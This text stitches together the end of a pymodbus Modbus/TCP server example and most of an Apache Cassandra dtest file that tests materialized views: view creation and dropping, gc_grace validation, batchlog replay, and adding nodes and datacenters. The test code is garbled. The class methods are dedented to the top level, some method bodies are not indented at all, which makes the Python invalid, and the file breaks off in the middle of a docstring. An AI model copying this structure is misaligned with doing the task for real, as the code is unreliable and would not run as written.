    # The same block instance backs every register type (di/co/hr/ir).
    store = ModbusSlaveContext(di=block, co=block, hr=block, ir=block)
    context = ModbusServerContext(slaves=store, single=True)

    # ----------------------------------------------------------------------- #
    # initialize the server information
    # ----------------------------------------------------------------------- #
    identity = ModbusDeviceIdentification()
    identity.VendorName = 'pymodbus'
    identity.ProductCode = 'PM'
    identity.VendorUrl = 'http://github.com/riptideio/pymodbus/'
    identity.ProductName = 'pymodbus Server'
    identity.ModelName = 'pymodbus Server'
    identity.MajorMinorRevision = version.short()

    # ----------------------------------------------------------------------- #
    # run the server you want
    # ----------------------------------------------------------------------- #
    # p = Process(target=device_writer, args=(queue,))
    # p.start()
    # Blocks here serving modbus/TCP on localhost:5020.
    StartTcpServer(context, identity=identity, address=("localhost", 5020))
if __name__ == "__main__":
    run_custom_db_server()
|
materialized_views_test.py | import collections
import re
import sys
import time
import traceback
import pytest
import threading
import logging
from flaky import flaky
from enum import Enum
from queue import Empty
from functools import partial
from multiprocessing import Process, Queue
from cassandra import ConsistencyLevel, InvalidRequest, WriteFailure
from cassandra.cluster import NoHostAvailable
from cassandra.concurrent import execute_concurrent_with_args
from cassandra.cluster import Cluster
from cassandra.query import SimpleStatement
from distutils.version import LooseVersion
from dtest import Tester, get_ip_from_node, create_ks
from tools.assertions import (assert_all, assert_crc_check_chance_equal,
assert_invalid, assert_none, assert_one,
assert_unavailable)
from tools.data import rows_to_list
from tools.misc import new_node
from tools.jmxutils import (JolokiaAgent, make_mbean)
since = pytest.mark.since
logger = logging.getLogger(__name__)

# CASSANDRA-10978. Migration wait (in seconds) to use in bootstrapping tests. Needed to handle
# pathological case of flushing schema keyspace for multiple data directories. See CASSANDRA-6696
# for multiple data directory changes and CASSANDRA-10421 for compaction logging that must be
# written.
MIGRATION_WAIT = 5
@flaky
@since('3.0')
class TestMaterializedViews(Tester):
    """
    Test materialized views implementation.
    @jira_ticket CASSANDRA-6477
    @since 3.0
    """
def _rows_to_list(self, rows):
new_list = [list(row) for row in rows]
return new_list
def prepare(self, user_table=False, rf=1, options=None, nodes=3, install_byteman=False, **kwargs):
    """Start a cluster with materialized views enabled and return a CQL
    session connected to node1 with keyspace `ks` created.

    :param user_table: when True, also create the `users` table and its
                       `users_by_state` materialized view
    :param rf: replication factor for the `ks` keyspace
    :param options: extra cassandra.yaml options to apply cluster-wide
    :param nodes: number of nodes in the first datacenter
    :param install_byteman: install byteman agents for fault injection
    """
    cluster = self.cluster
    cluster.set_configuration_options({'enable_materialized_views': 'true'})
    cluster.populate([nodes, 0], install_byteman=install_byteman)
    if options:
        cluster.set_configuration_options(values=options)
    cluster.start()
    node1 = cluster.nodelist()[0]
    session = self.patient_cql_connection(node1, **kwargs)
    create_ks(session, 'ks', rf)

    if user_table:
        session.execute(
            ("CREATE TABLE users (username varchar, password varchar, gender varchar, "
             "session_token varchar, state varchar, birth_year bigint, "
             "PRIMARY KEY (username));")
        )

        # create a materialized view
        session.execute(("CREATE MATERIALIZED VIEW users_by_state AS "
                         "SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
                         "PRIMARY KEY (state, username)"))

    return session
def update_view(self, session, query, flush, compact=False):
    """Execute a mutation, replay batchlogs, then optionally flush/compact
    the whole cluster so the view update reaches disk."""
    session.execute(query)
    self._replay_batchlogs()
    if flush:
        self.cluster.flush()
    if compact:
        self.cluster.compact()
def _settle_nodes(self):
    """Block until every running node has replayed its batchlog and all
    thread-pool stages are idle (no active or pending tasks)."""
    logger.debug("Settling all nodes")
    stage_match = re.compile(r"(?P<name>\S+)\s+(?P<active>\d+)\s+(?P<pending>\d+)\s+(?P<completed>\d+)\s+(?P<blocked>\d+)\s+(?P<alltimeblocked>\d+)")

    def _settled_stages(node):
        # Parse `nodetool tpstats` output; "settled" means every stage
        # reports zero active and zero pending tasks.
        (stdout, stderr, rc) = node.nodetool("tpstats")
        lines = re.split("\n+", stdout)
        for line in lines:
            match = stage_match.match(line)
            if match is not None:
                active = int(match.group('active'))
                pending = int(match.group('pending'))
                if active != 0 or pending != 0:
                    logger.debug("%s - pool %s still has %d active and %d pending" % (node.name, match.group("name"), active, pending))
                    return False
        return True

    for node in self.cluster.nodelist():
        if node.is_running():
            node.nodetool("replaybatchlog")
            attempts = 50  # 100 milliseconds per attempt, so 5 seconds total
            while attempts > 0 and not _settled_stages(node):
                time.sleep(0.1)
                attempts -= 1
def _build_progress_table(self):
if self.cluster.version() >= '4':
return 'system.view_builds_in_progress'
else:
return 'system.views_builds_in_progress'
def _wait_for_view(self, ks, view):
    """Poll each running node until the build of ks.view has finished
    (no rows remain in the build-progress table), failing after ~50s."""
    logger.debug("waiting for view")

    def _view_build_finished(node):
        s = self.patient_exclusive_cql_connection(node)
        query = "SELECT * FROM %s WHERE keyspace_name='%s' AND view_name='%s'" %\
                (self._build_progress_table(), ks, view)
        result = list(s.execute(query))
        # No in-progress rows means the build completed on this node.
        return len(result) == 0

    for node in self.cluster.nodelist():
        if node.is_running():
            attempts = 50  # 1 sec per attempt, so 50 seconds total
            while attempts > 0 and not _view_build_finished(node):
                time.sleep(1)
                attempts -= 1
            if attempts <= 0:
                raise RuntimeError("View {}.{} build not finished after 50 seconds.".format(ks, view))
def _wait_for_view_build_start(self, session, ks, view, wait_minutes=2):
    """Wait for the start of a MV build, ensuring that it has saved some progress.

    Polls the build-progress system table until at least one row for
    (ks, view) appears, failing after `wait_minutes` minutes.
    """
    start = time.time()
    while True:
        try:
            query = "SELECT COUNT(*) FROM %s WHERE keyspace_name='%s' AND view_name='%s'" %\
                    (self._build_progress_table(), ks, view)
            result = list(session.execute(query))
            assert 0 == result[0].count
        except AssertionError:
            # Progress rows exist -> the build has started.
            break

        elapsed = (time.time() - start) / 60
        if elapsed > wait_minutes:
            # BUG FIX: the timeout message hard-coded "2 minutes" even when
            # a caller passed a different wait_minutes value.
            self.fail("The MV build hasn't started in {} minutes.".format(wait_minutes))
def _insert_data(self, session):
    """Insert four sample users, then wait for the writes (and their view
    updates) to fully settle across the cluster."""
    # insert data
    insert_stmt = "INSERT INTO users (username, password, gender, state, birth_year) VALUES "
    session.execute(insert_stmt + "('user1', 'ch@ngem3a', 'f', 'TX', 1968);")
    session.execute(insert_stmt + "('user2', 'ch@ngem3b', 'm', 'CA', 1971);")
    session.execute(insert_stmt + "('user3', 'ch@ngem3c', 'f', 'FL', 1978);")
    session.execute(insert_stmt + "('user4', 'ch@ngem3d', 'm', 'TX', 1974);")
    self._settle_nodes()
def _replay_batchlogs(self):
    """Force batchlog replay on every running node, then verify the
    batchlog table ends up empty."""
    for node in self.cluster.nodelist():
        if node.is_running():
            logger.debug("Replaying batchlog on node {}".format(node.name))
            node.nodetool("replaybatchlog")
            # CASSANDRA-13069 - Ensure replayed mutations are removed from the batchlog
            node_session = self.patient_exclusive_cql_connection(node)
            result = list(node_session.execute("SELECT count(*) FROM system.batches;"))
            assert result[0].count == 0
def _assert_view_meta(self, session, views, exists=True, nodes=2):
    """Check the view bookkeeping tables: when `exists`, expect `views`
    built views (plus per-node build-status rows on 3.11+); otherwise all
    bookkeeping tables must be empty. The build-progress table must always
    be empty once builds have finished."""
    if exists:
        assert_one(session, "SELECT COUNT(*) FROM system.built_views", [views])
        if self.cluster.version() >= '3.11':
            assert_one(session, "SELECT COUNT(*) FROM system_distributed.view_build_status", [views * nodes])
    else:
        assert_none(session, "SELECT * FROM system.built_views")
        if self.cluster.version() >= '3.11':
            assert_none(session, "SELECT * FROM system_distributed.view_build_status")
    assert_none(session, "SELECT * FROM {}".format(self._build_progress_table()))
def test_view_metadata_cleanup(self):
    """
    drop keyspace or view should clear built_views and view_build_status
    """
    session = self.prepare(rf=2, nodes=2)

    def populate_data(session, rows):
        logger.debug("populate base data")
        for v in range(rows):
            session.execute("INSERT INTO t(k,c,a,b,e,f) VALUES({v},{v},{v},{v},{v},{v})".format(v=v))

    def verify_data(session, rows, views):
        logger.debug("verify view data")
        for v in range(rows):
            for view in range(views):
                assert_one(session, "SELECT * FROM mv{} WHERE k={v} AND c={v}".format(view, v=v), [v, v, v, v, v, v])

    def create_keyspace(session, ks="ks1", rf=2):
        create_ks(session, ks, rf)

    def create_table(session):
        logger.debug("create base table")
        session.execute("CREATE TABLE t (k int, c int, a int, b int, e int, f int, primary key(k, c))")

    def create_views(session, views, keyspace="ks1"):
        logger.debug("create view")
        for view in range(views):
            session.execute("CREATE MATERIALIZED VIEW mv{} AS SELECT * FROM t "
                            "WHERE k IS NOT NULL AND c IS NOT NULL PRIMARY KEY (c,k)".format(view),
                            timeout=60)
            self._wait_for_view(keyspace, "mv{}".format(view))

    def drop_keyspace(session, keyspace="ks1"):
        logger.debug("drop keyspace {}".format(keyspace))
        session.execute("DROP KEYSPACE IF EXISTS {}".format(keyspace),
                        timeout=60)

    def drop_views(session, views):
        logger.debug("drop all views")
        for view in range(views):
            session.execute("DROP MATERIALIZED VIEW IF EXISTS mv{}".format(view))

    rows = 100
    views = 5

    # Scenario 1: dropping the whole keyspace clears all view metadata.
    create_keyspace(session)
    create_table(session)
    populate_data(session, rows)
    create_views(session, views)
    verify_data(session, rows, views)

    self._assert_view_meta(session, views)
    drop_keyspace(session)
    self._assert_view_meta(session, views, exists=False)

    # Scenario 2: dropping only the views clears the metadata as well.
    create_keyspace(session)
    create_table(session)
    populate_data(session, rows)
    create_views(session, views)
    verify_data(session, rows, views)

    self._assert_view_meta(session, views)
    drop_views(session, views)
    self._assert_view_meta(session, views, exists=False)
def test_create(self):
    """Test the materialized view creation"""
    session = self.prepare(user_table=True)

    result = list(session.execute(("SELECT * FROM system_schema.views "
                                   "WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))

    # BUG FIX: the original message was malformed ("Expecting 1 materialized
    # view == got[...]"); use the "Expecting {}, got {}" phrasing that the
    # sibling assertions in this class use.
    assert len(result) == 1, "Expecting 1 materialized view, got {}".format(result)
def test_gcgs_validation(self):
    """Verify that it's not possible to create or set a too low gc_grace_seconds on MVs"""
    session = self.prepare(user_table=True)

    # Shouldn't be able to alter the gc_grace_seconds of the base table to 0
    assert_invalid(session,
                   "ALTER TABLE users WITH gc_grace_seconds = 0",
                   "Cannot alter gc_grace_seconds of the base table of a materialized view "
                   "to 0, since this value is used to TTL undelivered updates. Setting "
                   "gc_grace_seconds too low might cause undelivered updates to expire "
                   "before being replayed.")
    # But can alter the gc_grace_seconds of the base table to a value != 0
    session.execute("ALTER TABLE users WITH gc_grace_seconds = 10")

    # Shouldn't be able to alter the gc_grace_seconds of the MV to 0
    assert_invalid(session,
                   "ALTER MATERIALIZED VIEW users_by_state WITH gc_grace_seconds = 0",
                   "Cannot alter gc_grace_seconds of a materialized view to 0, since "
                   "this value is used to TTL undelivered updates. Setting gc_grace_seconds "
                   "too low might cause undelivered updates to expire before being replayed.")

    # Now let's drop MV
    session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")

    # Now we should be able to set the gc_grace_seconds of the base table to 0
    session.execute("ALTER TABLE users WITH gc_grace_seconds = 0")

    # Now we shouldn't be able to create a new MV on this table
    assert_invalid(session,
                   "CREATE MATERIALIZED VIEW users_by_state AS "
                   "SELECT * FROM users WHERE STATE IS NOT NULL AND username IS NOT NULL "
                   "PRIMARY KEY (state, username)",
                   "Cannot create materialized view 'users_by_state' for base table 'users' "
                   "with gc_grace_seconds of 0, since this value is used to TTL undelivered "
                   "updates. Setting gc_grace_seconds too low might cause undelivered updates"
                   " to expire before being replayed.")
def test_insert(self):
    """Test basic insertions"""
    session = self.prepare(user_table=True)

    self._insert_data(session)

    result = list(session.execute("SELECT * FROM users;"))
    # BUG FIX: the original used "{} ... {}".format(4 == len(result)) -- the
    # comma was mistyped as "==", so format() received a single bool and the
    # second placeholder would itself raise IndexError whenever the
    # assertion failed (sibling test_prepared_statement shows the intended
    # form).
    assert len(result) == 4, "Expecting {} users, got {}".format(4, len(result))

    result = list(session.execute("SELECT * FROM users_by_state WHERE state='TX';"))
    assert len(result) == 2, "Expecting {} users, got {}".format(2, len(result))

    result = list(session.execute("SELECT * FROM users_by_state WHERE state='CA';"))
    assert len(result) == 1, "Expecting {} users, got {}".format(1, len(result))

    result = list(session.execute("SELECT * FROM users_by_state WHERE state='MA';"))
    assert len(result) == 0, "Expecting {} users, got {}".format(0, len(result))
def test_populate_mv_after_insert(self):
    """Test that a view is OK when created with existing data"""
    session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")

    for i in range(1000):
        session.execute("INSERT INTO t (id, v) VALUES ({v}, {v})".format(v=i))

    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
                     "AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("wait for view to build")
    self._wait_for_view("ks", "t_by_v")

    logger.debug("wait that all batchlogs are replayed")
    self._replay_batchlogs()

    # Every pre-existing base row must now be queryable through the view.
    for i in range(1000):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(i), [i, i])
@pytest.mark.xfail(reason="Should be addressed with CASSANDRA-15845")
@since('4.0')
def test_populate_mv_after_insert_wide_rows_version40(self):
    # 4.0+ variant of the wide-rows populate test (currently expected to fail).
    self.test_populate_mv_after_insert_wide_rows()
@since('3.0', max_version='3.X')
def test_populate_mv_after_insert_wide_rows(self):
    """Test that a view is OK when created with existing data with wide rows"""
    session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)

    session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v))")

    # 5 partitions x 10000 clustering rows each
    for i in range(5):
        for j in range(10000):
            session.execute("INSERT INTO t (id, v) VALUES ({}, {})".format(i, j))

    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
                     "AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("wait for view to build")
    self._wait_for_view("ks", "t_by_v")

    logger.debug("wait that all batchlogs are replayed")
    self._replay_batchlogs()
    for i in range(5):
        for j in range(10000):
            assert_one(session, "SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, j), [j, i])
def test_crc_check_chance(self):
    """Test that crc_check_chance parameter is properly populated after mv creation and update"""
    session = self.prepare()

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t WHERE v IS NOT NULL "
                     "AND id IS NOT NULL PRIMARY KEY (v, id) WITH crc_check_chance = 0.5"))

    # Value set at creation time must be visible in the schema...
    assert_crc_check_chance_equal(session, "t_by_v", 0.5, view=True)

    session.execute("ALTER MATERIALIZED VIEW t_by_v WITH crc_check_chance = 0.3")

    # ...and so must a value applied via ALTER.
    assert_crc_check_chance_equal(session, "t_by_v", 0.3, view=True)
def test_prepared_statement(self):
    """Test basic insertions with prepared statement"""
    session = self.prepare(user_table=True)

    insertPrepared = session.prepare(
        "INSERT INTO users (username, password, gender, state, birth_year) VALUES (?, ?, ?, ?, ?);"
    )
    selectPrepared = session.prepare(
        "SELECT state, password, session_token FROM users_by_state WHERE state=?;"
    )

    # insert data
    session.execute(insertPrepared.bind(('user1', 'ch@ngem3a', 'f', 'TX', 1968)))
    session.execute(insertPrepared.bind(('user2', 'ch@ngem3b', 'm', 'CA', 1971)))
    session.execute(insertPrepared.bind(('user3', 'ch@ngem3c', 'f', 'FL', 1978)))
    session.execute(insertPrepared.bind(('user4', 'ch@ngem3d', 'm', 'TX', 1974)))

    result = list(session.execute("SELECT * FROM users;"))
    assert len(result) == 4, "Expecting {} users, got {}".format(4, len(result))

    # Query the view through the prepared SELECT for each state.
    result = list(session.execute(selectPrepared.bind(['TX'])))
    assert len(result) == 2, "Expecting {} users, got {}".format(2, len(result))

    result = list(session.execute(selectPrepared.bind(['CA'])))
    assert len(result) == 1, "Expecting {} users, got {}".format(1, len(result))

    result = list(session.execute(selectPrepared.bind(['MA'])))
    assert len(result) == 0, "Expecting {} users, got {}".format(0, len(result))
def test_immutable(self):
    """Test that a materialized view is immutable"""
    session = self.prepare(user_table=True)

    # cannot insert
    assert_invalid(session, "INSERT INTO users_by_state (state, username) VALUES ('TX', 'user1');",
                   "Cannot directly modify a materialized view")

    # cannot update
    assert_invalid(session, "UPDATE users_by_state SET session_token='XYZ' WHERE username='user1' AND state = 'TX';",
                   "Cannot directly modify a materialized view")

    # cannot delete a row
    assert_invalid(session, "DELETE from users_by_state where state='TX';",
                   "Cannot directly modify a materialized view")

    # cannot delete a cell
    assert_invalid(session, "DELETE session_token from users_by_state where state='TX';",
                   "Cannot directly modify a materialized view")

    # cannot alter a table
    assert_invalid(session, "ALTER TABLE users_by_state ADD first_name varchar",
                   "Cannot use ALTER TABLE on Materialized View")
def test_drop_mv(self):
    """Verify that DROP MATERIALIZED VIEW removes the view from the schema tables."""
    session = self.prepare(user_table=True)

    views_query = ("SELECT * FROM system_schema.views "
                   "WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")

    # Add a second view on the same base table, bringing the total to two.
    session.execute(("CREATE MATERIALIZED VIEW users_by_birth_year AS "
                     "SELECT * FROM users WHERE birth_year IS NOT NULL AND "
                     "username IS NOT NULL PRIMARY KEY (birth_year, username)"))
    rows = list(session.execute(views_query))
    assert len(rows) == 2, "Expecting {} materialized view, got {}".format(2, len(rows))

    # Dropping one of the two views must leave exactly one behind.
    session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
    rows = list(session.execute(views_query))
    assert len(rows) == 1, "Expecting {} materialized view, got {}".format(1, len(rows))
def test_drop_column(self):
    """Verify that a base-table column referenced by a view cannot be dropped."""
    session = self.prepare(user_table=True)

    rows = list(session.execute(("SELECT * FROM system_schema.views "
                                 "WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")))
    assert len(rows) == 1, "Expecting {} materialized view, got {}".format(1, len(rows))

    # 'state' is part of the view's primary key, so dropping it must be refused.
    assert_invalid(
        session,
        "ALTER TABLE ks.users DROP state;",
        "Cannot drop column state on base table with materialized views."
    )
def test_drop_table(self):
    """Test that we cannot drop a table without deleting its MVs first.

    Dropping the base table must fail while a view depends on it; after
    dropping the view the table drop succeeds and no view metadata remains.
    """
    session = self.prepare(user_table=True)
    views_query = ("SELECT * FROM system_schema.views "
                   "WHERE keyspace_name='ks' AND base_table_name='users' ALLOW FILTERING")

    result = list(session.execute(views_query))
    assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))

    # The table drop must be refused while the view still exists ...
    assert_invalid(
        session,
        "DROP TABLE ks.users;",
        "Cannot drop table when materialized views still depend on it"
    )
    # ... and the failed drop must not have removed the view metadata.
    result = list(session.execute(views_query))
    assert len(result) == 1, "Expecting {} materialized view, got {}".format(1, len(result))

    # Dropping the view first makes the table drop legal.
    session.execute("DROP MATERIALIZED VIEW ks.users_by_state;")
    session.execute("DROP TABLE ks.users;")
    result = list(session.execute(views_query))
    # Bug fix: the failure message previously formatted 1 as the expected
    # count even though this assertion checks that no views remain.
    assert len(result) == 0, "Expecting {} materialized view, got {}".format(0, len(result))
def test_clustering_column(self):
    """Verify that base-table clustering columns can serve as a view's primary key."""
    session = self.prepare(consistency_level=ConsistencyLevel.QUORUM)

    session.execute(("CREATE TABLE users (username varchar, password varchar, gender varchar, "
                     "session_token varchar, state varchar, birth_year bigint, "
                     "PRIMARY KEY (username, state, birth_year));"))
    # View keyed on both clustering columns plus the base partition key.
    session.execute(("CREATE MATERIALIZED VIEW users_by_state_birth_year "
                     "AS SELECT * FROM users WHERE state IS NOT NULL AND birth_year IS NOT NULL "
                     "AND username IS NOT NULL PRIMARY KEY (state, birth_year, username)"))
    session.cluster.control_connection.wait_for_schema_agreement()

    self._insert_data(session)

    by_state = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX'"))
    assert len(by_state) == 2, "Expecting {} users, got {}".format(2, len(by_state))

    by_state_year = list(session.execute("SELECT * FROM ks.users_by_state_birth_year WHERE state='TX' AND birth_year=1968"))
    assert len(by_state_year) == 1, "Expecting {} users, got {}".format(1, len(by_state_year))
def _add_dc_after_mv_test(self, rf, nts):
    """
    @jira_ticket CASSANDRA-10978
    Add datacenter with configurable replication.

    Shared driver for the add-datacenter tests: `rf` is passed straight to
    prepare() (an int for SimpleStrategy, a dict for NTS); when `nts` is
    true the keyspaces are switched to NetworkTopologyStrategy and the new
    dc is rebuilt from dc1 before verification.
    """
    session = self.prepare(rf=rf)

    logger.debug("Creating schema")
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("Writing 1k to base")
    for i in range(1000):
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))

    logger.debug("Reading 1k from view")
    for i in range(1000):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])

    logger.debug("Reading 1k from base")
    for i in range(1000):
        assert_one(session, "SELECT * FROM t WHERE id = {}".format(i), [i, -i])

    logger.debug("Bootstrapping new node in another dc")
    node4 = new_node(self.cluster, data_center='dc2')
    node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])

    logger.debug("Bootstrapping new node in another dc")
    node5 = new_node(self.cluster, remote_debug_port='1414', data_center='dc2')
    node5.start(jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)], wait_for_binary_proto=True)
    if nts:
        # Move to NTS with one replica per dc, then stream dc2's data from dc1.
        session.execute("alter keyspace ks with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
        session.execute("alter keyspace system_auth with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
        session.execute("alter keyspace system_traces with replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':1}")
        node4.nodetool('rebuild dc1')
        node5.nodetool('rebuild dc1')

    # LOCAL_ONE keeps the verification reads inside dc2 for the NTS case.
    cl = ConsistencyLevel.LOCAL_ONE if nts else ConsistencyLevel.ONE
    session2 = self.patient_exclusive_cql_connection(node4, consistency_level=cl)

    logger.debug("Verifying data from new node in view")
    for i in range(1000):
        assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-i), [-i, i])

    logger.debug("Inserting 100 into base")
    for i in range(1000, 1100):
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))

    logger.debug("Verify 100 in view")
    for i in range(1000, 1100):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
@pytest.mark.resource_intensive
def test_add_dc_after_mv_simple_replication(self):
    """
    @jira_ticket CASSANDRA-10634
    Test that materialized views work as expected when adding a datacenter with SimpleStrategy.
    """
    self._add_dc_after_mv_test(rf=1, nts=False)
@pytest.mark.resource_intensive
def test_add_dc_after_mv_network_replication(self):
    """
    @jira_ticket CASSANDRA-10634
    Test that materialized views work as expected when adding a datacenter with NetworkTopologyStrategy.
    """
    self._add_dc_after_mv_test(rf={'dc1': 1}, nts=True)
@pytest.mark.resource_intensive
def test_add_node_after_mv(self):
    """
    @jira_ticket CASSANDRA-10978
    Test that materialized views work as expected when adding a node.
    """
    session = self.prepare()

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    for key in range(1000):
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=key, v=-key))
    for key in range(1000):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-key), [-key, key])

    node4 = new_node(self.cluster)
    node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])

    session2 = self.patient_exclusive_cql_connection(node4)

    # @jira_ticket CASSANDRA-12984
    # Assert that MVs are marked as built after bootstrap; otherwise newly
    # streamed MVs would be built again.
    assert_one(session2, "SELECT count(*) FROM system.built_views WHERE keyspace_name = 'ks' AND view_name = 't_by_v'", [1])

    for key in range(1000):
        assert_one(session2, "SELECT * FROM ks.t_by_v WHERE v = {}".format(-key), [-key, key])

    # Keep writing through the original session and verify the view again.
    for key in range(1000, 1100):
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=key, v=-key))
    for key in range(1000, 1100):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-key), [-key, key])
def test_insert_during_range_movement_rf1(self):
    """Insert-during-join coverage for replication factor 1."""
    self._base_test_insert_during_range_movement(1)
def test_insert_during_range_movement_rf2(self):
    """Insert-during-join coverage for replication factor 2."""
    self._base_test_insert_during_range_movement(2)
def test_insert_during_range_movement_rf3(self):
    """Insert-during-join coverage for replication factor 3."""
    self._base_test_insert_during_range_movement(3)
def _base_test_insert_during_range_movement(self, rf):
    """
    @jira_ticket CASSANDRA-14251
    Test that materialized views replication work in the middle of a join
    for different replication factors.
    """
    session = self.prepare(rf=rf)

    logger.debug("Creating table and view")
    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    logger.debug("Starting new node4 in write survey mode")
    node4 = new_node(self.cluster)
    # Set batchlog.replay_timeout_seconds=1 so we can ensure batchlog will be replayed below
    node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.write_survey=true",
                                                      "-Dcassandra.batchlog.replay_timeout_in_ms=1"])

    logger.debug("Insert data while node4 is joining")
    for i in range(1000):
        session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=-i))

    logger.debug("Finish joining node4")
    node4.nodetool("join")

    logger.debug('Replay batchlogs')
    time.sleep(0.001)  # Wait batchlog.replay_timeout_in_ms=1 (ms)
    self._replay_batchlogs()

    # Every base write must be visible through the view once replay is done.
    logger.debug("Verify data")
    for i in range(1000):
        assert_one(session, "SELECT * FROM t_by_v WHERE v = {}".format(-i), [-i, i])
@pytest.mark.resource_intensive
def test_add_node_after_wide_mv_with_range_deletions(self):
    """
    @jira_ticket CASSANDRA-11670
    Test that materialized views work with wide materialized views as expected when adding a node.
    """
    session = self.prepare()

    # NOTE(review): compaction is disabled — presumably so the range
    # tombstones written below survive until bootstrap streaming; confirm.
    session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY (id, v)) WITH compaction = { 'class': 'SizeTieredCompactionStrategy', 'enabled': 'false' }")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))

    # 10 partitions x 100 clustering rows each.
    for i in range(10):
        for j in range(100):
            session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))

    self.cluster.flush()

    for i in range(10):
        for j in range(100):
            assert_one(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j), [i, j])
            assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])

    # Range-delete rows j and j+1 for every j divisible by 10.
    for i in range(10):
        for j in range(100):
            if j % 10 == 0:
                session.execute("DELETE FROM t WHERE id = {} AND v >= {} and v < {}".format(i, j, j + 2))

    self.cluster.flush()

    for i in range(10):
        for j in range(100):
            if j % 10 == 0 or (j - 1) % 10 == 0:
                # Covered by the range tombstone above — gone from base and view.
                assert_none(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j))
                assert_none(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j))
            else:
                assert_one(session, "SELECT * FROM t WHERE id = {} and v = {}".format(i, j), [i, j])
                assert_one(session, "SELECT * FROM t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])

    # Bootstrap a fourth node with a small mutation size cap (CASSANDRA-11670).
    node4 = new_node(self.cluster)
    node4.set_configuration_options(values={'max_mutation_size_in_kb': 20})  # CASSANDRA-11670
    logger.debug("Start join at {}".format(time.strftime("%H:%M:%S")))
    node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.migration_task_wait_in_seconds={}".format(MIGRATION_WAIT)])

    session2 = self.patient_exclusive_cql_connection(node4)

    # The new node must have streamed both live rows and range tombstones.
    for i in range(10):
        for j in range(100):
            if j % 10 == 0 or (j - 1) % 10 == 0:
                assert_none(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j))
                assert_none(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j))
            else:
                assert_one(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j), [i, j])
                assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])

    # Widen each partition after the bootstrap and re-verify via the new node.
    for i in range(10):
        for j in range(100, 110):
            session.execute("INSERT INTO t (id, v) VALUES ({id}, {v})".format(id=i, v=j))

    for i in range(10):
        for j in range(110):
            if j < 100 and (j % 10 == 0 or (j - 1) % 10 == 0):
                assert_none(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j))
                assert_none(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j))
            else:
                assert_one(session2, "SELECT * FROM ks.t WHERE id = {} and v = {}".format(i, j), [i, j])
                assert_one(session2, "SELECT * FROM ks.t_by_v WHERE id = {} and v = {}".format(i, j), [j, i])
@pytest.mark.resource_intensive
def test_add_node_after_very_wide_mv(self):
    """
